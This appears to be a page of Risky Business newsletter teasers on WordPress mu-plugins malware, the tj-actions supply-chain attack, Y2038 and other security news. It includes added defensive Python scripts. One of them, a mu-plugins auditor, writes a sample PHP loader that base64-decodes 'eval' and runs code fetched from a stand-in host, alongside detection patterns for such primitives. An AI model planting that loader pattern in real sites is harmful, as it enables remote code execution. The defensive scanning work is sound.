Newsletters

Written content from the Risky Business Media team

Risky Bulletin: Hackers abuse secret WordPress feature you'll probably want to disable

Presented by

Catalin Cimpanu

News Editor

Hackers are abusing a little-known WordPress feature called Must Use Plugins to install malware and hide it from site administrators.

Also known as mu-plugins, Must Use Plugins have been part of the WordPress CMS for well over a decade.

Any PHP file placed in the special wp-content/mu-plugins folder is loaded automatically on every request, without being installed or activated through the dashboard. Such files cannot be deactivated from the admin interface and are listed only under a separate "Must-Use" tab of the Plugins screen, which is what makes the folder a convenient hiding place for malicious code.
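The following audit script is an added example, not code from the newsletter or from WordPress. It reproduces the one loading rule that matters for triage (WordPress only auto-loads top-level *.php files from the mu-plugins directory; files in subdirectories run only if a top-level file includes them) and flags the obfuscation and remote-fetch primitives that dropped loaders typically rely on. The indicator list, the sample directory and its file contents are all constructed for the example.

```python
import os
import re
import tempfile

# Primitives common in dropped loaders and web shells. A hit is a prompt to
# read the file, not proof of compromise; legitimate mu-plugins rarely use any.
SUSPICIOUS = {
    "eval": re.compile(r"\beval\s*\("),
    "base64_decode": re.compile(r"\bbase64_decode\s*\("),
    "inflate_or_rot13": re.compile(r"\b(gzinflate|gzuncompress|str_rot13)\s*\("),
    "remote_fetch": re.compile(r"\b(curl_exec\s*\(|file_get_contents\s*\(\s*['\"]https?://)"),
    "dynamic_call": re.compile(r"\$[A-Za-z_]\w*\s*\("),  # $f(...) variable function
}


def loaded_mu_plugins(mu_dir):
    """Files WordPress will auto-load: top-level *.php only, sorted by name."""
    if not os.path.isdir(mu_dir):
        return []
    return sorted(
        os.path.join(mu_dir, name)
        for name in os.listdir(mu_dir)
        if name.endswith(".php") and os.path.isfile(os.path.join(mu_dir, name))
    )


def audit_mu_plugins(mu_dir):
    """Return {filename: [indicator names]} for every auto-loaded file."""
    report = {}
    for path in loaded_mu_plugins(mu_dir):
        with open(path, "r", encoding="utf-8", errors="replace") as fh:
            src = fh.read()
        report[os.path.basename(path)] = [
            name for name, rx in SUSPICIOUS.items() if rx.search(src)
        ]
    return report


def build_sample_dir():
    """Constructed sample: one benign tweak file, one dropper-style loader,
    and a file in a subdirectory that WordPress would never load directly."""
    root = tempfile.mkdtemp()
    mu = os.path.join(root, "wp-content", "mu-plugins")
    os.makedirs(os.path.join(mu, "vendor"))
    with open(os.path.join(mu, "00-site-tweaks.php"), "w") as fh:
        fh.write("<?php\nadd_filter('xmlrpc_enabled', '__return_false');\n")
    with open(os.path.join(mu, "wp-cache-helper.php"), "w") as fh:
        fh.write(
            "<?php\n"
            "$k = 'ZXZhbA==';\n"                      # base64 of 'eval'
            "$f = base64_decode($k);\n"
            "$f(file_get_contents('https://example.invalid/p.txt'));\n"
        )
    with open(os.path.join(mu, "vendor", "ignored.php"), "w") as fh:
        fh.write("<?php eval('1');\n")
    return mu


if __name__ == "__main__":
    for name, hits in audit_mu_plugins(build_sample_dir()).items():
        print(f"{name}: {'SUSPICIOUS ' + ', '.join(hits) if hits else 'clean'}")
```

Run it against a real install by passing the site's wp-content/mu-plugins path to audit_mu_plugins(). Because the directory is populated by whoever has write access to the filesystem rather than through the dashboard, the file list itself is the thing to compare against your deployment manifest: any name you did not put there deserves a look regardless of what the indicator scan says.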

Risky Bulletin: France runs phishing test on 2.5 million students

Presented by

Catalin Cimpanu

News Editor

Last week, the French government conducted a large-scale phishing test on over 2.5 million middle and high school students.

The test placed a link in the students' school digital workspace advertising cheats and cracked games; students who clicked were redirected to a phishing awareness video.

According to CNIL, France's privacy watchdog, over 210,000 students clicked the link, roughly one in twelve.

The Signalgate Messages Have Been Released and Oh My God

Presented by

Tom Uren

Policy & Intelligence

The Trump Administration's cavalier disregard for common sense security protocols is blatantly inviting serious security breaches. This week exposed the absence of any kind of security culture at the highest levels of the US national security community.

The story of how The Atlantic editor in chief was inadvertently added to a high-level US national security discussion covering plans for military action against Houthi rebels in Yemen has been well covered in the media, so we won't rehash it all.

In short, The Atlantic's Jeffrey Goldberg was added to a Signal group chat in which senior US officials discussed plans for military action against Houthi rebels in Yemen. The group chat included Vice President J.D. Vance, Defence Secretary Pete Hegseth, CIA Director John Ratcliffe and Director of National Intelligence Tulsi Gabbard, among others. 

Risky Bulletin: Cyberattack hits Ukraine's state railway

Presented by

Catalin Cimpanu

News Editor

Ukraine's state railway company, Ukrzaliznytsia, says a "massive targeted cyber attack" took down its online ticketing system over the weekend.

The incident took place on Sunday night. In a Facebook post, Ukrzaliznytsia blamed the incident on "the enemy," a term Ukrainians use to describe Russia.

The company's website is currently down, and officials are restoring from backups. The incident was very likely a data wiper attack, which Russian hackers have employed on numerous occasions since Russia's invasion in February 2022.

Risky Bulletin: The looming epochalypse

Presented by

Catalin Cimpanu

News Editor

I'll start this newsletter edition by saying from the get-go that today's topic—the Year 2038 problem—isn't new at all.

It has a Wikipedia page dating back to 2005, a 2009 XKCD comic, and was at the center of a Guardian article back in 2014.

It was a tweet from security researcher Pedro Umbelino last week that reminded me of this problem and how close to its deadline we have gotten—because, yes, everyone gets old!
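For readers who have not met the problem before, here is an added example (not from the newsletter) showing exactly what breaks. A Unix timestamp stored in a signed 32-bit time_t runs out at 2^31 - 1 seconds after the epoch; one second later the value wraps to -2^31 and reads as a date in 1901. The helper simulates that truncation so the behaviour can be inspected on a 64-bit host; the unsigned variant is included as well, since some file formats and protocols defer the problem to 2106 rather than removing it.

```python
import struct
from datetime import datetime, timedelta, timezone

EPOCH = datetime(1970, 1, 1, tzinfo=timezone.utc)
INT32_MAX = 2**31 - 1          # last second a signed 32-bit time_t can hold
UINT32_MAX = 2**32 - 1         # last second an unsigned 32-bit field can hold


def as_utc(ts):
    """Unix seconds -> ISO-8601 UTC string; works for pre-1970 and post-2038 values."""
    return (EPOCH + timedelta(seconds=ts)).isoformat().replace("+00:00", "Z")


def store_time32(ts, signed=True):
    """Simulate writing `ts` into a 32-bit time_t and reading it back.

    Keeps the low 32 bits and reinterprets them, which is what a 32-bit
    binary (or a 32-bit on-disk field) actually does on overflow.
    """
    raw = struct.pack("<I", ts & 0xFFFFFFFF)
    return struct.unpack("<i" if signed else "<I", raw)[0]


def overflows_time32(ts, signed=True):
    """True if `ts` cannot survive a round trip through a 32-bit time_t."""
    return store_time32(ts, signed) != ts


def rollover_table():
    """Show the boundary seconds as a 64-bit system, a signed-32 system and an
    unsigned-32 system would each interpret them."""
    rows = []
    for ts in (INT32_MAX, INT32_MAX + 1, UINT32_MAX, UINT32_MAX + 1):
        rows.append((
            as_utc(ts),
            as_utc(store_time32(ts, signed=True)),
            as_utc(store_time32(ts, signed=False)),
        ))
    return rows


if __name__ == "__main__":
    print(f"{'64-bit':<22}{'signed 32-bit':<22}{'unsigned 32-bit'}")
    for real, s32, u32 in rollover_table():
        print(f"{real:<22}{s32:<22}{u32}")
```

The practical use of overflows_time32() is to feed it the timestamps that will still be in use in 2038, such as certificate and token expiry dates, scheduled-job times and retention windows, and see which of them a 32-bit consumer would already misread today.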

Risky Bulletin: Hacktivists claim cyber-sabotage of 116 Iranian ships

Presented by

Catalin Cimpanu

News Editor

An anti-regime hacktivist group has claimed credit for a cyberattack that crippled the on-ship communication systems of 116 Iranian ships.

The ships are operated by the National Iranian Tanker Company (50) and the Islamic Republic of Iran Shipping Company (66).

According to Nariman Gharib, a London-based Iranian cyber espionage investigator, the alleged affected vessels are these ones.

China's MSS Doxxes and Threatens Taiwanese APT Operators

Presented by

Tom Uren

Policy & Intelligence

China ramped up its name and shame cyber rhetoric this week when it identified and threatened four Taiwanese individuals it alleges are involved in cyber operations targeting the mainland. 

The four were named in a Chinese Ministry of State Security (MSS) Weixin post that published the names, passport-style photographs, birthdates, ID numbers and job titles within Taiwan's Information Communication Electronic Force Command (ICEFCOM). The unit was set up in 2017 and brings together the Ministry of National Defense's communication, cyber and electronic warfare units. 

This is the second time that the MSS has doxxed Taiwanese military hackers. In September of last year it published the identities of three other alleged cyber operators, but without some of the more granular identifying details.

Risky Bulletin: China says Taiwan's military is behind PoisonIvy APT

Presented by

Catalin Cimpanu

News Editor

China's main intelligence agency said on Monday that a branch of the Taiwanese military is behind an APT group known as PoisonIvy and GreenSpot.

China's Ministry of State Security (MSS) says a cyber warfare center (Network Environment Research and Analysis Center) inside the Taiwan Information, Communications, and Electronic Force Command (ICEFCOM) is behind the APT group's operations.

The MSS accused ICEFCOM of hacking Chinese government agencies, military targets, organizations in China's critical sectors, and private sector companies.

Risky Bulletin: GitHub supply chain attack prints everyone's secrets in build logs

Presented by

Catalin Cimpanu

News Editor

A threat actor compromised a popular GitHub Action and added malicious code that prints out secret tokens in project build logs.

The incident took place on Friday and impacted tj-actions/changed-files (hereinafter Changed-Files), an automated action used by over 23,000 GitHub projects.

The action works by analyzing pull requests and reporting which files have changed. It is used in complex CI/CD pipelines to trigger other actions based on what files were modified. It is a basic but very important automation script, which is why it became one of GitHub's most popular actions.
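The durable lesson from this incident is about how actions are referenced: a `uses: owner/repo@v45` line resolves a tag at run time, and in this attack the existing version tags of tj-actions/changed-files were moved to point at the malicious commit, so workflows pinned to tags pulled the payload on their next run while only full commit-SHA pins were unaffected. The scanner below is an added example, not code from the newsletter or from GitHub; it walks workflow text for `uses:` references and reports anything that is not an immutable SHA. The regexes and the sample workflow are constructed for the example.

```python
import re

# Matches `uses:` both in job steps (`- uses: ...`) and at job level for
# reusable workflows (`uses: org/repo/.github/workflows/x.yml@ref`).
USES_RE = re.compile(r"^\s*-?\s*uses:\s*['\"]?([^\s'\"#]+)", re.M)
SHA_RE = re.compile(r"^[0-9a-f]{40}$")


def classify_uses(ref):
    """Classify one `uses:` reference.

    local   ./path                 pinned by the calling repo's own commit
    docker  docker://image         outside GitHub's action model; pin by digest separately
    sha     owner/repo@<40 hex>    immutable
    mutable owner/repo@tag|branch  can be repointed by the owner or an attacker;
            no ref at all          resolves to the default branch
    """
    if ref.startswith("./"):
        return "local"
    if ref.startswith("docker://"):
        return "docker"
    if "@" not in ref:
        return "mutable"
    _, version = ref.rsplit("@", 1)
    return "sha" if SHA_RE.match(version) else "mutable"


def find_unpinned(workflow_text):
    """Return [(ref, classification)] for every reference that is not SHA-pinned or local."""
    findings = []
    for match in USES_RE.finditer(workflow_text):
        ref = match.group(1)
        kind = classify_uses(ref)
        if kind in ("mutable", "docker"):
            findings.append((ref, kind))
    return findings


# Constructed sample workflow; the 40-hex SHA below is a placeholder, not a real commit.
SAMPLE_WORKFLOW = """\
name: ci
on: [pull_request]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: tj-actions/changed-files@v45
      - uses: actions/setup-node@0123456789abcdef0123456789abcdef01234567 # v4
      - uses: ./.github/actions/lint
      - uses: docker://alpine:3.19
"""


if __name__ == "__main__":
    for ref, kind in find_unpinned(SAMPLE_WORKFLOW):
        print(f"{kind:8} {ref}")
```

To run it over a repository, read each file under .github/workflows/ and pass its contents to find_unpinned(). The trailing `# v4` comment convention on a SHA-pinned line is how most teams keep the pin readable; the comment is ignored by the parser, so it should be treated as documentation, not as the pin itself.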

Risky Bulletin: FBI warns of online file converters that distribute malware

Presented by

Catalin Cimpanu

News Editor

The FBI says that cybercriminals are using free file format and document conversion tools to scrape personal data and deploy malware, and even ransomware.

The warning applies to websites that convert files between different formats, but also to apps that users download on their devices.

Reports of malware being added to a converted file have been around for over a decade, although no major security breach has ever been linked to a file converter.